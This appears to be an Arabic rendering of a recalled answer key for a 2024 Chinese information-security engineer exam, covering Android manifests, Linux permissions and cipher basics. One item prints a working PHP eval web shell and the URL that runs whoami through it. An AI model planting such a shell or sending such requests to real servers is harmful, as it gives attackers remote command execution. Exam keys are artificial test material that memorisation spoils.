
2024年信息安全工程师、2024InformationSecurityEngineer
2024 مهندس أمن المعلومات، 2024InformationSecurityEngineer
الاختبار البرمجي (软考) - موعد الامتحان : 2024年11月08日
الدليل/الملف الذي يخزّن التوقيع ___ (نقطتان) الإجابة: META-INF
الدليل/الملف الذي يخزّن الأذونات ___ (نقطتان) الإجابة: AndroidManifest.xml
السؤال 5 (10 نقاط) (1) أي إعداد يدعم النسخ الاحتياطي؛ (2) يمكنه قراءة معلومات الموقع التاريخي، فهل توجد مخاطر أمنية؛ (3) في ملف الإعدادات، أيٌّ من المكونات الأربعة الرئيسية تم استخدامها؛ (4) أي مكوّن لديه أعلى خطر لتسريب المعلومات؛ (5) هل يوجد إساءة استخدام للمعلومات؟ اشرح بالتفصيل؛
الإجابة: (1) backup...... لا يدعم النسخ الاحتياطي (2) توجد مخاطر خفية، فهناك خطر تسريب المعلومات غير المعروفة (3) Activity وBroadcastRecevier (4) Contentprovider (5) توجد إساءة استخدام للمعلومات، وأذونات الموقع والكاميرا والتخزين وجهات الاتصال والوسائط المتعددة والبلوتوث وغيرها، وكثير منها يُعد جمعًا مفرطًا
هل يمتلك المستخدم صلاحية root في أندرويد (نقطتان) الإجابة: لا
الاسم الكامل للأمر ll ___ (نقطتان)الإجابة: ls -l
هل المستخدم الحالي هو root أم مستخدم عادي ___ (نقطتان) الإجابة: root
التمثيل الرقمي لأذونات الملف ___ (نقطتان)الإجابة: rw-r--r-- 644
ماذا يعني ../ في الشكل ___ (نقطتان)الإجابة: المجلد الأب (الدليل الأعلى)، /var/www/html
الأمر المدمج في Linux لحساب قيم التجزئة ___ (نقطتان)md5sum; sha1sum; shasum -a 256
shell.php <?php @eval($_GET["cmd"]); ?> (5 نقاط)
- ما هي كلمة مرور الاتصال المقابلة لهذا الملف؟ الإجابة: cmd
- ما هو أسلوب طلب http؟ الإجابة: GET
- بافتراض أن النطاق هو abc.com، ما هي URL الكاملة لطلب تنفيذ whoami؟ الإجابة: abc.com/shell.php?cmd=system("whoami")
- إلى جانب التشفير المتماثل وغير المتماثل، ما الطريقة الأخرى للتشفير وفقًا لطريقة معالجة النص الصريح؟ (نقطتان) الإجابة: التشفير الكتلي والتشفير التدفقي
- تمثيل a على 8 بت (نقطتان) الإجابة: 97 ---》 01100001
- نتيجة تشفير a مع abc باستخدام XOR (6 نقاط) الإجابة: 032 أو 00000000 00000011 00000010
- بمعرفة mi، وki، وci، ما هي المعادلة للحصول على النص الصريح؟ (نقطتان) الإجابة: mi = ki XOR ^ ci
- هل من الآمن تشفير نصّين صريحين مختلفين باستخدام نفس مفتاح التشفير التدفقي؟ ولماذا؟ (نقطتان) الإجابة: غير آمن، إذ يمكن اشتقاق أحد النصين الصريحين من الآخر
- هل يمكن استخدام التشفير الكتلي كتشفير تدفقي؟ (نقطة واحدة) الإجابة: نعم، يمكن